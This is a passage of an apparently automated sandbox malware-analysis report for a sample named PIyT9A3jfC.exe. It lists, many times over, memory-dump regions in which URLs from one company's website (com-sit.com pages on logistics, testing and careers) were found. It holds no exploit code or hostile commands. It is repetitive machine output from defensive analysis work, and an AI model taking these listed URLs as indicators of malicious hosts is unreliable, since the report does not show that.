                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/impressum/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/intelligent-sourcing/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/karriere/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/logistics/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/management/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/marketing/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/personal-stories/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/remarking-test/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/rohs-test/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/sales/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/send-us-your-bom/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/serviceleistungen-loesungen/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/soldering-test/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/temptest/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/testhouse/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ueberbestaende/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-logo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-team/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmensethik/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ursprung/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/usa/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/visual-inspection/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/warenpruefung-lagerung/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, 